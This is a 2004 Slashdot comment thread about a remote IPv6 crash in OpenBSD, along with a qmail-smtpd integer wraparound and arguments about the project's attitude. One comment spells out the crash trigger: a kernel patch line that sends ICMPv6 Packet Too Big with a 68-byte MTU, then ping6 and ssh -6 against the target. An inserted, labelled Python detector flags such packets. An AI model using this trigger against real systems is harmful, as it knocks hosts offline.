Basically, Georgi Guninski found a way to cause the current child process of 'qmail-smtpd' to abend -- this is not a DoS, as it only affects your child SMTP session, and is likely not possible in an RFC-compliant message.
Technically the issue is the use of a signed integer as a counter when it is also used as an index into the array (containing the current line?). If the counter is incremented to the point that it "wraps around" (technically overflows, but not in the same sense as a buffer overflow), then when the counter is used as an offset into an array, it causes a "segment violation" fault.
Because the counter is used as an offset into an array for the purpose of reading the value of a byte, and the process is killed as soon as it tries to access memory outside of its segment (SEGV), this is inherently non-exploitable for privilege escalation.
As I said, it's silly, is only an issue because the rest of DJB's code is so clean you could eat off it, and as Georgi Guninski says,
I do not deploy Linux. Ever.
Here's what I saw in the advisory:
ping6 openbsd
ssh -6 openbsd
Notice the ssh -6? Now how many people do you know will run an ssh server as tcp6? He will have to be really interested in ipv6 and run a couple of daemons and run an ipv6 home network.
So if he's mucking with ipv6, for one he's not running critical servers and has critical data on his server that needs to be 99.999% available.
Secondly there's really not many people who would muck with ipv6 in the first place.
So I think OBSD is still pretty much secure and this bug shouldn't harm OBSD's image. Bugs appear in OSes all the time and this one, with all the press it's getting will do much less damage to OBSD servers around than the bugs for Windows and other Unixen will.
"Give orange me give eat orange me eat orange give me eat orange give me you." -Nim Chimpsky
It's Slowlaris. Please use the correct terminology next time.
However, keep in mind that there are quite a few areas in (all?) BSD-derived IP stacks where a seriously malformed packet will cause the kernel itself to throw up its hands and call panic("WTF?!?").
I've found that just about any system will eventually panic if you sic ISIC at it from within the same subnet.
Cool OpenBSD kernel panic messages:
or the elegantly simple:
I have a modifier to add six points for troll posts, so this actually gets *modded up* to five points on my computer. And at least you got what you asked for. A lot of people think they're trolling and ask for a troll mod, but they get flamebait. Dumbasses.
(by comparition)
whaaaat? OH! you mean comparison... I know you've got a low UID an' all, but i mean - come on maaaan
> you can safely assume the people using openBSD don't bother to pay attention
that statement is probably one of the most ignorant i have _ever_ read on /. i hope you don't work in this industry; i don't even think i'd trust you to salt fries.
no. you have to patch the attacker's kernel. Then you have to light 6 candles, carefully placing 2 of them on the magnetic poles of the earth..the other 4 candles must be placed inside your rectum for a period of 7 days during which you cannot consume water. This remote crash is gay. You shouldn't have ipv6 enabled on a fucking production box anyway.
Actually you don't need to do any of the candle part at all. You probably loved researching that part though, didn't you Theo?
Yeah, you're not going to see a worm that infects Linux hosts, patches their kernels, recompiles, and executes these commands against OpenBSD.org...
The BSD is dying trolls should orchestrate an attack on every known BSD server out there, then come back to /. and tell us all about how BSD is dying. Heck, at that point, maybe it would be dead.
I get it now. We leave. You guard the prince. The prince has to patch his kernel.
graspee
Just use VPN through it and it comes down with the slightest traffic between the VPN server and client
"Fighting terrorists with military might is like killing a mosquito on your Dad's forehead with a rifle."
...OpenBSD is just crashing.
I think that it means that you need a patched Linux kernel in order to generate and send the borked packets that cause the crash on an OpenBSD box. The modded network stack is used on a Linux machine to crash an OpenBSD machine.
I'm surprised the crash made slashdot, but not the root exploit in BSD that was posted to BugTraq at the same time. To wit:
http://www.securityfocus.com/archive/1/352733
The response from TdR shouldn't be
Ok, tell me *WHY* it should be any different. And when you have figured out one or more reasons why it should be anything different, match those reasons to the list here:
http://www.openbsd.org/goals.html
If you get any matches, please post them here afterwards.
It is not the goal to conquer all unices, nor to please you or me or any other users. Neither is it a goal to produce comments that can't be misinterpreted out of context either. So what if Theo is an asshole, so what if he is blunt, uncharismatic, unfriendly or not on your list of likeable persons? He doesn't care for what you like, until you start producing workable code. And neither do I, but I don't run a project like that. He does. And he can say what goes and what doesn't. You (and others) need to figure out really quickly that it's not about you. They don't do all that work for you, it's for _them_.
It may come as a shock for you to realise it, but if you slam the door and never return it won't matter to them. Really. If the (true - as of now) statement offends you so much, by all means go somewhere else. It will not matter. It will not change any facts, and it will not change openbsd, and it will not change the track record of openbsd.
-- I'm as unique as everyone else.
...was in windows 9x. But I can understand this. This is an IPv6 stack, ie: it's likely people are GOING to find bugs in ipv6 stacks. They're too new. It's hard, however, to find such bugs in an IPv4 implementation, just because it has been working for decades. IMHO this is a quite minor bug if you think that the VAST majority of openbsd users are NOT (sadly ;) using ipv6
It does not need to be remote root, to be called a hole, but it does need to have a hole something can get in through. If you can't get in, it's not a hole, but a bug and a crash.
What, writing raw ethernet packets won't work?
I don't see how you'd need to "patch the kernel" or "roll your own network stack" at all. Granted, I don't have a Linux machine available right now and I don't know the inner workings of this exploit, but looking at the "patch" and the two commands issued to carry out the exploit, it looks very much like all you have to do is send an icmp6-packet-too-big to the target (which is trivial with packet sockets in linux and other datalink interfaces in other operating systems, including windows) and then open a tcp connection.
/* we coulnd't care less */ //joro
case ICMPV6_ECHO_REPLY:
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev);
then:
ping6 openbsd
ssh -6 openbsd
The patch just sends an icmp6-packet-too-big when it receives an echo reply, which it gets from the target after pinging it, and ssh of course just opens a tcp connection.
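A defender-side check for the trigger the comment above describes, added here as an example and not part of the thread or of Guninski's advisory: it parses raw IPv6 frames as a packet socket or pcap reader would hand them over, flags ICMPv6 Packet Too Big messages whose advertised MTU is below the 1280-byte IPv6 minimum link MTU, and runs over a constructed sample capture. The link-local addresses are made up, and the 68-byte MTU is taken from the patch line above purely as sample data.

```python
import socket
import struct

# From the IPv6 / ICMPv6 RFCs (RFC 2460, RFC 2463).
IPV6_MIN_MTU = 1280        # minimum IPv6 link MTU; no valid path MTU is smaller
IPPROTO_ICMPV6 = 58
ICMPV6_PKT_TOO_BIG = 2     # type 2, code 0; the advertised MTU sits in bytes 4-7

def parse_ipv6(pkt: bytes):
    """Split a raw IPv6 packet into (next_header, src, dst, payload); None if malformed."""
    if len(pkt) < 40 or (pkt[0] >> 4) != 6:
        return None
    payload_len, nxt = struct.unpack_from("!HB", pkt, 4)
    if len(pkt) < 40 + payload_len:
        return None
    return nxt, pkt[8:24], pkt[24:40], pkt[40:40 + payload_len]

def check_packet_too_big(pkt: bytes):
    """None unless pkt is an ICMPv6 Packet Too Big; otherwise the sender, the
    advertised MTU and whether it is below the IPv6 minimum. Checksums are
    not verified: this classifies captured frames, it is not a stack."""
    parsed = parse_ipv6(pkt)
    if parsed is None:
        return None
    nxt, src, _dst, payload = parsed
    if nxt != IPPROTO_ICMPV6 or len(payload) < 8:
        return None
    icmp_type, code, _csum, mtu = struct.unpack_from("!BBHI", payload, 0)
    if icmp_type != ICMPV6_PKT_TOO_BIG or code != 0:
        return None
    return {"src": socket.inet_ntop(socket.AF_INET6, src),
            "mtu": mtu, "suspicious": mtu < IPV6_MIN_MTU}

def suspicious_ptb_senders(packets):
    """Sources in a capture that advertised a path MTU below 1280 bytes."""
    hits = set()
    for pkt in packets:
        result = check_packet_too_big(pkt)
        if result and result["suspicious"]:
            hits.add(result["src"])
    return hits

def _constructed_ptb(src: str, dst: str, mtu: int) -> bytes:
    """Constructed sample for the demo only: IPv6 header plus an ICMPv6 Packet
    Too Big with a zero checksum and no invoking-packet body."""
    icmp = struct.pack("!BBHI", ICMPV6_PKT_TOO_BIG, 0, 0, mtu)
    ip6 = struct.pack("!IHBB", 6 << 28, len(icmp), IPPROTO_ICMPV6, 64)
    ip6 += socket.inet_pton(socket.AF_INET6, src)
    ip6 += socket.inet_pton(socket.AF_INET6, dst)
    return ip6 + icmp

# Constructed sample capture: a PTB advertising the 68-byte MTU from the patch
# line above, a legitimate PTB, and a non-ICMPv6 packet (next header 6 = TCP).
SAMPLE_CAPTURE = [
    _constructed_ptb("fe80::1", "fe80::2", 68),
    _constructed_ptb("fe80::3", "fe80::2", 1400),
    struct.pack("!IHBB", 6 << 28, 0, 6, 64) + bytes(32),
]

if __name__ == "__main__":
    for pkt in SAMPLE_CAPTURE:
        print(check_packet_too_big(pkt))
    print("suspicious senders:", suspicious_ptb_senders(SAMPLE_CAPTURE))
```

A real deployment would feed frames from a packet socket or a pcap file into suspicious_ptb_senders and alert on any source it returns.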
What about raw sockets?
Now the specialist press, including web sites, who know of the existence of OpenBSD, are likely to treat this in much the same way. A BSD crash, any variant, is a rarity, 1000 times or more less likely to happen than a BSOD. Same sort of ratio for security holes also. So, the same thing happens, the uncommon major event gets the attention, although it does far, far less harm overall than the very common everyday event.
Of course in this case the normal press remain in utter ignorance, some of them may know that Windoze is not the same as a MAC, a few will know of Linux, and very few indeed will know what BSD is, they probably think it is a shorter abbreviation for BSOD. So, the mainstream press will leave this well alone.
It is quite right and proper that crashes should be reported, and certainly it is only fair that a problem with a secure OS gets to be known, and fixed, but like the train crash, it needs to be kept in perspective.
I know that Theo allegedly has an attitude problem, however those who extrapolate from his remark that it is only a crash to suggest that he does not care are IMHO quite wrong. I think he was only putting the event in its true perspective, as being of slightly less importance than a security breach. I think he does care, very much, that "his" software works properly, that is what drives such people, who could earn much more financial reward elsewhere.
All of this is a matter of seeing the thing in its true perspective. If people did that, no-one at all would use the products of the Convicted Monopolist, and the world would be a very much safer place as regards computer security, and much more productive because there would probably be only one crash for 1000 or even 1000000 BSODs in inferior systems, which are riddled with fundamental design errors.
If they want a system with users, it helps to not turn them away by being rude and dismissive.
Users are good for lots of goals, because users find, report, and sometimes fix bugs.
If they want cooperation from other OS/app writers, it helps to be less competitive. I know these aren't *directly* on the list, but surely they contribute indirectly to the goals.
Just as you defend Theo's right to say things like that, should I not also have the right to call him on his attitude?
I find it hard to believe that anything taken out of context could be worse than what he says in context:
Granted, OpenBSD is his baby.
Is there any way that we could prod Santana to bring his binary patches up to date for 3.3 i386 when the patch is released?
I've already emailed him that I'd send him $50.
...the documentation advises against building your own kernel unless you have a very good reason. They won't support you, either (not that their support will solve all your problems).
C'mon, how many people are running IPv6? I'm sure both of them have upgraded to -current already.
At least mafia-owned pizzarias make excellent pizza. Compare to Bill Gates.
If you are gonna sit there and talk out of your ass about how removing IPv6 from your kernel has any benefit at all, you should back it up. It won't affect performance or security, so wtf is it helping? If you don't use IPv6, nobody can connect via IPv6, and therefore it's not any more secure to remove IPv6. In fact, it may be less secure as GENERIC kernels are by far the most widely used and tested, and there could be unintended and unknown issues with ganking out part of the kernel for no fucking reason.
It is not, however, in the default configuration, which is what they generally boast about. Thus, what you said is moot.
http://bsd.slashdot.org/article.pl?sid=04/02/05/2056234
Remotely Crash OpenBSD
Posted by CowboyNeal on Thu Feb 05, '04 22:49
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet6/ip6_output.c
CVS log for src/sys/netinet6/ip6_output.c
Revision 1.82, Wed Feb 4 08:47:41 2004
Get it?
Haida Manga
No, of course not. I know that they take security seriously at OpenBSD, I just don't think they should be such cocks about it.
Forgetting corporate inertia for a moment, you have the choice of hurried, not thoroughly tested, patches; or waiting weeks while they test it thoroughly.
Think of the sheer number of test cases. You've got how many different versions of Windows still supported. Multiply that by all the apps MSFT sells (e.g.: Office) and all the apps that major corporations also run (e.g. Oracle). Multiply by a few hundred hardware platforms.
I'm not particularly fond of MSFT myself, but complaining about the speed AND quality of their patches reflects poorly on you.
oh my god, dammit, you bastard
I have, on this very desk right now, a box running a stock, unmodified, out-of-the-box, default install of OpenBSD 3.4, which was just installed a few months ago.
It has IPV6 enabled.
Please look into these things before you post about them.
Doesn't that violate the first rule of security: restrict physical access? If anyone can walk in and access the firewalls/routers, they could do whatever they want to them, OpenBSD or not.
"Those who consume the bulk of goods are those who make them. We must never forget this secret of our prosperity."
I see. Interesting. :)
There is a difference between:
"He should do X" and
"I think he should do X to achieve Y".
Especially when Y isn't on the goals.html page.
Yes, more users would seem logical, but it's not one of the goals. Reread it and you'll see.
See Daniel Hartmeier's answer.
Basically OpenBSD releases are supported one year (2 releases). i.e. you have to upgrade only every other release. In fact a release is supported for 13 months to give users a 1 month window to upgrade.
At the time of the telnetd exploit (July 2001) the oldest supported release was 2.7 or 2.8 and telnetd had been disabled from the default install between 2.5 and 2.6. So if you used a supported release you were safe. Since upgrades are free and take about one hour there's no reason not to do it once a year...
Um, maybe you haven't seen that Microsoft has been making IE and Outlook Express for Mac since version 3 of Internet Explorer and Outlook Express 4.5. IE is also included in MacOS X installs.
I used to be indecisive, but now I'm not so sure.
But the Mac port of IE is a different codebase.
Here is an MSDN article from 1998 that tells how MS did it.
http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarwbgen/html/msdn_unixwin32.asp
They used MainSoft's Win32 layer for Unix.
-- Jason